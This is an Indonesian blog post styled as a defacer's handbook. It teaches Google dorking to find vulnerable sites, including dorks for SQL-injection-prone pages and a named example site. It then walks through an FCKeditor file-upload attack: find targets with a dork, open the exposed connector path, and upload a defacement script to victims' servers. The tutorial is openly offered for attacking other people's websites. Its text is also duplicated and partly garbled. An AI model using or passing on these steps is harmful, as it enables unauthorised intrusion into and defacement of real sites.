Buku sakti defacer
Assalamualikum wr.wb.
Ini adalah buku sakti para defacer
Belajar deface
BUKU SAKTI SEORANG DEFACER
Daftar Isi
1.Cara kembangin dork?
2.Apa itu DEFACE DAN METODE NYA
3.Teknik Dasar Membuat HTML
1.CARA KEMBANGIN DORK
Mungkin seorang defacer sudah mengenal yang namanya
dorking namun ada suatu ketika kita bingung stuck untuk
mengembangkan sebuah dork.
terus bagaimana si mengembangkan sebuah dork ?
oke kali ini saya akan membahasnya.
seblom kita mengembamngkan sebuah dork alngkah
baiknya kita mengerti apa yg di maksud :
inurl / allinurl = untuk mencari string pada url.
intext / allintext = untuk mencari nilai string ( text ) pada
web.
intitle / allintitle = untuk mencari judul atau title pada
website.site = untuk mencari pada web tertentu saja.
ext = untuk mencari extensi pada web ( bagi yang
ga tau Ekstensi dari sebuah file adalah karakter yang
terletak setelah titik terakhir dalam sebuah nama file.
seperti .html .php .asp .txt dll )
contoh penggunaan :
inurl / allinurl = inurl:blabla/blabla/.../blabla
intext / all intext = intext:"blabla" atau intext:blabla
intitle = intitle:blabal
site = site:id, site:com dll
ext = ext:html, ext:php, ext:asp, dll
di sini saya akan menggunakan dork di atas.
saya akan mencoba untuk dork untuk SQLi Base64 yaitu :
inurl:product.php?id=MQ==
hasil dari dork tersebut
kita bisa lihat hasil dari dork tersebut yaitu 51 hasil.
coba kita menggunakan allinurl : pada dork tersebut
inurl:product.php?id=MQ==
hasli dari dork tesebutkita bisa lihat ada perubahan hasil yang tadinya
mendaptkan 51 hasil kini menjadi 48 hasilnya.
sekarang kita coba untuk memilih salah satu website dan
kita akan mencoba mengembangkan dork dari url web
tersebut.
di sini saya mencoba pilih website yang paling atas dan
meliha - lihat isi website tersebut :
hal pertama yang saya lakukan ialah melihat masing -
masing menu yang ada di web tersebut dan melihat urlnya
Kita bisa lihat website tersebut dan menampilkan sebuah
url yang berbeda - beda
di sini saya akan mencoba mengambil url salah satu menu
pada tersebut ialah :
http://www.chakshueng.com/product.php?id=MTE=
dan saya akan mengambil url web terbut untuk saya
jadikan dork ( bukan webnya ).
urlnya ialah :
product.php?id=MTE=an kita lihat berpa hasil dari dork tersebut
Disitu kita bisa lihat hasil dari dork url web tersbut ialah
hanya menghasilkan 17 hasil saja
bagamina kita akan coba menghpus product.php? dan
hanya menjadi inurl:id=MTE= kita lihat hasilnya
Kita bisa lihat hasilnya yaitu sekitar 3,040 hasil.
sudah paham ya kegunaan inurl dan allinurl ? pastinya
sudah paham kan :D
oke saya kasih clue dan anda mudah - mudahan anda bisa
mengerti.
Bisa menggunakan @copyright pada suatu website.
Bisa menggunakan Url pada menu website.
Bisa menggunakan title pada menu login website.
Bisa menggunakan extensi pada Url website.
Bisa menggunakan text text tententu pada website.2 APA ITU DEFACE DAN METODE NYA
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini
dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam
sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada
website korban dengan tampilan yang dimiliki oleh si defacer.
Bagaimanakah cara nya yang paling simpel?
FCKEDITOR:
Kali Ini Kita Akan Mempelajari Teknik FCKeditor
Sediakan Dork
- inurl:advert_detail.php?id=
kembangin biar dapet yang pw :v
Exploit
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Fi
le&Connector=connectors/php/connector.php
Cari target menggunakan dork di atas
Kalo sudah pilih salah satu target , dan kalo sudah di pilih langsung masukan exploit nya
- Site.co.li/admin/FCKeditor/editor/filemanager/browser/default/browser.htm
l?Type=File&Connector=connectors/php/connector.php
Lalu langsung saja upload file script mu
1. Klik choose file ( cari script deface mu )]
2. Klik upload
Kalo sudah di upload file nya
Cara manggil sc nya [ site.co.li/files/scriptlu.html3.Cara membuat Html dasar?
Bahan :
-Kopi
-Rokok
-Bahasa pemrograman C / C+ / PHP ( anak esdeh juga bisa kok )
- Note pad
Oke langsung aja
Pertama kalian ketik
----- Head / Headers sebuah html
Gue gans ---------- kenapa harus jawaban nya adalah untuk mengakiri
sebuah ...... sebuah apa ya.... mungkin mantan :”v bukan itu untuk mengakiri sebuah Scirpt
pada Html sekian info dari saya trimakasih
Ini adalah buku sakti para defacer
Belajar deface
BUKU SAKTI SEORANG DEFACER
Daftar Isi
1.Cara kembangin dork?
2.Apa itu DEFACE DAN METODE NYA
3.Teknik Dasar Membuat HTML
1.CARA KEMBANGIN DORK
Mungkin seorang defacer sudah mengenal yang namanya
dorking namun ada suatu ketika kita bingung stuck untuk
mengembangkan sebuah dork.
terus bagaimana si mengembangkan sebuah dork ?
oke kali ini saya akan membahasnya.
seblom kita mengembamngkan sebuah dork alngkah
baiknya kita mengerti apa yg di maksud :
inurl / allinurl = untuk mencari string pada url.
intext / allintext = untuk mencari nilai string ( text ) pada
web.
intitle / allintitle = untuk mencari judul atau title pada
website.site = untuk mencari pada web tertentu saja.
ext = untuk mencari extensi pada web ( bagi yang
ga tau Ekstensi dari sebuah file adalah karakter yang
terletak setelah titik terakhir dalam sebuah nama file.
seperti .html .php .asp .txt dll )
contoh penggunaan :
inurl / allinurl = inurl:blabla/blabla/.../blabla
intext / all intext = intext:"blabla" atau intext:blabla
intitle = intitle:blabal
site = site:id, site:com dll
ext = ext:html, ext:php, ext:asp, dll
di sini saya akan menggunakan dork di atas.
saya akan mencoba untuk dork untuk SQLi Base64 yaitu :
inurl:product.php?id=MQ==
hasil dari dork tersebut
kita bisa lihat hasil dari dork tersebut yaitu 51 hasil.
coba kita menggunakan allinurl : pada dork tersebut
inurl:product.php?id=MQ==
hasli dari dork tesebutkita bisa lihat ada perubahan hasil yang tadinya
mendaptkan 51 hasil kini menjadi 48 hasilnya.
sekarang kita coba untuk memilih salah satu website dan
kita akan mencoba mengembangkan dork dari url web
tersebut.
di sini saya mencoba pilih website yang paling atas dan
meliha - lihat isi website tersebut :
hal pertama yang saya lakukan ialah melihat masing -
masing menu yang ada di web tersebut dan melihat urlnya
Kita bisa lihat website tersebut dan menampilkan sebuah
url yang berbeda - beda
di sini saya akan mencoba mengambil url salah satu menu
pada tersebut ialah :
http://www.chakshueng.com/product.php?id=MTE=
dan saya akan mengambil url web terbut untuk saya
jadikan dork ( bukan webnya ).
urlnya ialah :
product.php?id=MTE=an kita lihat berpa hasil dari dork tersebut
Disitu kita bisa lihat hasil dari dork url web tersbut ialah
hanya menghasilkan 17 hasil saja
bagamina kita akan coba menghpus product.php? dan
hanya menjadi inurl:id=MTE= kita lihat hasilnya
Kita bisa lihat hasilnya yaitu sekitar 3,040 hasil.
sudah paham ya kegunaan inurl dan allinurl ? pastinya
sudah paham kan :D
oke saya kasih clue dan anda mudah - mudahan anda bisa
mengerti.
Bisa menggunakan @copyright pada suatu website.
Bisa menggunakan Url pada menu website.
Bisa menggunakan title pada menu login website.
Bisa menggunakan extensi pada Url website.
Bisa menggunakan text text tententu pada website.2 APA ITU DEFACE DAN METODE NYA
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini
dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam
sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada
website korban dengan tampilan yang dimiliki oleh si defacer.
Bagaimanakah cara nya yang paling simpel?
FCKEDITOR:
Kali Ini Kita Akan Mempelajari Teknik FCKeditor
Sediakan Dork
- inurl:advert_detail.php?id=
kembangin biar dapet yang pw :v
Exploit
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Fi
le&Connector=connectors/php/connector.php
Cari target menggunakan dork di atas
Kalo sudah pilih salah satu target , dan kalo sudah di pilih langsung masukan exploit nya
- Site.co.li/admin/FCKeditor/editor/filemanager/browser/default/browser.htm
l?Type=File&Connector=connectors/php/connector.php
Lalu langsung saja upload file script mu
1. Klik choose file ( cari script deface mu )]
2. Klik upload
Kalo sudah di upload file nya
Cara manggil sc nya [ site.co.li/files/scriptlu.html3.Cara membuat Html dasar?
Bahan :
-Kopi
-Rokok
-Bahasa pemrograman C / C+ / PHP ( anak esdeh juga bisa kok )
- Note pad
Oke langsung aja
Pertama kalian ketik
----- Head / Headers sebuah html
sebuah ...... sebuah apa ya.... mungkin mantan :”v bukan itu untuk mengakiri sebuah Scirpt
pada Html sekian info dari saya trimakasih
Comments
Post a Comment